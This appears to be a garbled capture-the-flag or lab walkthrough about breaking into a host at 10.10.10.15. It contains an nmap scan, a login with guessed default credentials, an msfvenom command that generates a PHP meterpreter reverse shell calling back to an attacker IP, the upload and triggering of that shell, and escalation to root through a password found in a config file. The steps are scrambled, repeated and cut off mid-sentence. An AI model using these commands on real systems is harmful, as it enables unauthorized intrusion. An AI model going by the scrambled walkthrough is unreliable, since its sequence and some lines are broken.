http://10.10.10.15 The webpage appears to be a simple website with a " Contact Us" form. However, upon inspecting the page source, we notice a peculiar comment:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:
After exploring the file system, we discover that the sudo command has been configured to allow the fish user to run any command without a password: hack fish.io
With administrative access, we can now explore the application's functionality. Upon reviewing the dashboard, we notice a " Upload File" feature. This feature can potentially be used to execute arbitrary code on the server.
Next, we visit the HTTP service running on port 80: http://10
nmap -sV -p- 10.10.10.15 The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further.
<!-- TODO: move to prod env --> This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces: This feature can potentially be used to execute
http://10.10.10.15/uploads/shell.php A meterpreter shell opens, allowing us to navigate the file system and escalate privileges.
http://10.10.10.15/admin Indeed, we find a simple login form. After attempting some common credentials, we manage to log in using the username admin and password password123 .
cat ~fish/config The file contains a password for the root user. We can now switch to the root user and gain full access to the system:
su root
